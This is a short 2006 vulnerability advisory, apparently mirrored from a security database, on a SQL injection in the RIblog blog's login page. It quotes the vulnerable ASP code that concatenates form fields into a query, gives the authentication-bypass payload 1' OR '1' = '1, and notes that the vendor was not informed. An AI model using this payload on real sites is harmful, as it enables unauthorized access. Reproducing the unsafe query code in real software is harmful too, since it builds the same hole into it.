Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12402
HistoryApr 25, 2006 - 12:00 a.m.

RIblog Remote SQL Injection Exploit

2006-04-2500:00:00
vulners.com
6

      - RIblog Remote SQL Injection Exploit -

-= http://colander.altervista.org/advisory/riblog.txt =-

		-= RIblog =-

Omnipresent
April 21, 2006

Vunerability(s):

SQL Injection

Product:

bloggage

Vendor:

http://romedahl.com

Description of product:

It is a Blog.

Not Available Yet.

Vulnerability / Exploit:

This software is vulnerable to a Remote SQL Injection.

Take a look of this script in

[…]

doLogin = Request.Form("login") 'login

If doLogin = "" Then

Trim(Request.Form("login"))

End If

' Submit to self
If doLogin = "true" Then

		If sUserName = "" Then
		 sUserName = Trim(Request.Form("UserName"))
		End If

		If sPassword = "" Then
		 sPassword = Trim(Request.Form("Password"))
		End If


		Set myRecSet = server.createobject("adodb.recordset")
		strConn = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & strDBPath & ";"
		Set myConn = server.createobject("adodb.connection")
		myConn.open strConn

		strSQL = "SELECT * FROM tUser WHERE  fuser = '"& sUserName  &"' and fpassword = '" & sPassword &"';"

[…]

As you can see, the string strSQL is the query passed to the DB. And the variables sUserName and sPassword are not properly
sanitised. So, an attacker can exploit this vulnerability by injection SQL Code. Like the example below:

1' OR '1' = '1

The attacker have to put the string above in the username and password fields.

the query will be:

strSQL = "SELECT * FROM tUser WHERE fuser = '1' OR '1' ='1' and fpassword = '1' OR '1' ='1';

The attacker can gain access to the blog and edit, view comments, etc, etc.

Vendor Status

Not informed!

Credits:

omnipresent
[email protected]